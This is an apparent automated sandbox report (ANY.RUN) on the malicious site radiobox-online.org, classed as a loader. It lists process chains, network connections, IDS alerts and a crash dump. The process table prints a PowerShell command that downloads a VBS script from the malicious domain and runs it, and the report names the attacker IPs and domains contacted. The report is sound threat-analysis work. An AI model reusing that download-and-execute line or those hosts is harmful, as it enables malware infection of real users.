URL: | https://radiobox-online.org |
Full analysis: | https://app.any.run/tasks/e24945bb-027e-4aee-a3b1-7ea12444439c |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | July 11, 2019, 14:13:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
MD5: | 06A91C9A2B41D18AE12262D69E7E4BE7 |
SHA1: | 1C1CF643427A6ABFAEF155604576BEEB4B692AAC |
SHA256: | 3DA957483194BBDF6BADBB7F3E7EB79BCD5057C932AD8F28444073939A8F7800 |
SSDEEP: | 3:N8XKmNMs:2L |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3076 | "C:\Program Files\Internet Explorer\iexplore.exe" https://radiobox-online.org | C:\Program Files\Internet Explorer\iexplore.exe | | explorer.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Internet Explorer; Version: 8.00.7600.16385 (win7_rtm.090713-1255) | | | |
3556 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3076 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | | iexplore.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Internet Explorer; Version: 8.00.7600.16385 (win7_rtm.090713-1255) | | | |
3968 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('https://radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | iexplore.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
3872 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('https://radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | iexplore.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
2432 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\documentation.vbs" | C:\Windows\System32\WScript.exe | | powershell.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Version: 5.8.7600.16385 | | | |
3620 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\temp.vbs" | C:\Windows\System32\WScript.exe | | WScript.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Version: 5.8.7600.16385 | | | |
3896 | "C:\Users\admin\AppData\Local\Temp\temp69.exe" | C:\Users\admin\AppData\Local\Temp\temp69.exe | | WScript.exe
| User: admin; Company: Piriform Ltd; Integrity Level: MEDIUM; Description: CCleaner; Exit code: 0; Version: 4, 11, 00, 4619 | | | |
2660 | attrib +h +s C:\Temp | C:\Windows\system32\attrib.exe | — | temp69.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Attribute Utility; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
3692 | "C:\Temp\KB24115436.exe" | C:\Temp\KB24115436.exe | | temp69.exe
| User: admin; Company: Qihoo 360 Technology Co. Ltd.; Integrity Level: MEDIUM; Description: 360 Total Security; Exit code: 0; Version: 10,0,0,1160 | | | |
4028 | "C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe" -pjf74idD | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe | | KB24115436.exe
| User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | |
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3076 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | — | —
3076 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | —
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\03N2YC2E\radiobox-online_org[1].txt | — | — | —
3076 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\favicon[1].ico | — | — | —
3076 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].jpg | — | — | —
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YHFMM8KG4U2Z6E28PO8Q.temp | — | — | —
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071120190712\index.dat | dat | 10DF8A304F3729376E6D69A0F9D83D14 | 94BDF3C304CFC707FDE2DDF46956AE4E92AE8834D337ADA1D89CCD76039A1970
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | 915F37EA4D5F1E1B565F90E7FCF14C99 | 441B9CA9853C8568D247470C709FC9803EA2C14D405D4ACA337B25987F9DE49D
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FXBC15DU\radiobox-online_org[1].htm | html | 14BAE31BDB6CE0216A7C13A5F6FFAF83 | 07F2F4C293EF11D35C1F0ED0816CB022E6DA1407A16197A84A5198015E7AE49C
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | 7470B2FFEF14BA4A118CB1782AD461A4 | 39F398161A64403AFDC5756BB6EDCB17F56CA5947B27CAE35A3CF3FD4E0AD5A8
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2268 | client32.exe | POST | 200 | 5.45.73.63:4151 | http://5.45.73.63/fakeurl.htm | NL | binary | 159 b | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/3.jpg | unknown | html | 716 b | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/2.jpg | unknown | html | 716 b | suspicious |
3620 | WScript.exe | GET | 200 | 45.12.215.157:80 | http://45.12.215.157/images/1.jpg | unknown | executable | 2.64 Mb | suspicious |
2432 | WScript.exe | GET | 200 | 45.12.215.157:80 | http://45.12.215.157/src/load2.jpg | unknown | text | 8.70 Kb | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/3.jpg | unknown | html | 716 b | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/3.jpg | unknown | html | 716 b | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/2.jpg | unknown | html | 716 b | suspicious |
2268 | client32.exe | POST | — | 5.45.73.63:4151 | http://5.45.73.63/fakeurl.htm | NL | — | — | suspicious |
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/4.jpg | unknown | html | 716 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2432 | WScript.exe | 88.99.66.31:443 | 2no.co | Hetzner Online GmbH | DE | malicious |
3076 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3556 | iexplore.exe | 88.99.66.31:443 | 2no.co | Hetzner Online GmbH | DE | malicious |
3556 | iexplore.exe | 185.206.213.173:443 | radiobox-online.org | LeaseWeb Netherlands B.V. | NL | unknown |
3872 | powershell.exe | 185.206.213.173:443 | radiobox-online.org | LeaseWeb Netherlands B.V. | NL | unknown |
3076 | iexplore.exe | 185.206.213.173:443 | radiobox-online.org | LeaseWeb Netherlands B.V. | NL | unknown |
2432 | WScript.exe | 45.12.215.157:80 | — | — | — | suspicious |
2268 | client32.exe | 5.45.73.63:4151 | — | Serverius Holding B.V. | NL | suspicious |
3620 | WScript.exe | 45.12.215.157:80 | — | — | — | suspicious |
3896 | temp69.exe | 185.212.130.9:443 | avheaven.icu | Virtual Trade Ltd | NL | malicious |
Domain | IP | Reputation
---|---|---
radiobox-online.org | — | malicious
www.bing.com | — | whitelisted
2no.co | — | whitelisted
avheaven.icu | — | malicious
geo.netsupportsoftware.com | — | suspicious
PID | Process | Class | Message |
---|---|---|---|
3556 | iexplore.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] IP Check Domain SSL certificate |
3556 | iexplore.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] IP Check Domain SSL certificate |
2432 | WScript.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] IP Check Domain SSL certificate |
2432 | WScript.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] IP Check Domain SSL certificate |
3620 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
3620 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
3620 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3620 | WScript.exe | A Network Trojan was detected | ET TROJAN JS/WSF Downloader Dec 08 2016 M4 |
3620 | WScript.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
3620 | WScript.exe | Misc activity | SUSPICIOUS [PTsecurity] PE as Image Content type mismatch |
Process | Message
---|---
client32.exe | Exception caught at 6a355a83. Trying minidump.
client32.exe | Register dump and call stack at EIP=6A355A83 (reproduced in the block below)
client32.exe | Assert, tid=93c, tid=93c

```text
EAX=0004E32C EBX=00000000 ECX=7707CC01 EDX=00000000 ESI=00000C83
EDI=0575FAD0 EBP=0575FAB8 ESP=0575FA88 EIP=6A355A83 FLG=00010202
CS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000 TID=93C
EIP:
F7 7F 04 59 83 F8 0A 7E 03 89 77 04 8B 47 04 5F 5E 5B C9 C3 55 8B EC 51
Callstack:
0x6A355A83 PCIINV.DLL (12.10.0.30): GetInventoryEx + 11063 bytes
0x6A35AEF6 PCIINV.DLL (12.10.0.30): GetInventoryEx + 32682 bytes
0x6A3526B1 PCIINV.DLL (12.10.0.30): Cancel + 2808 bytes
0x77083C45 kernel32.dll (6.01.7601.17514): BaseThreadInitThunk + 18 bytes
0x771737F5 ntdll.dll (6.01.7601.17514): RtlInitializeExceptionChain + 239 bytes
0x771737C8 ntdll.dll (6.01.7601.17514): RtlInitializeExceptionChain + 194 bytes
```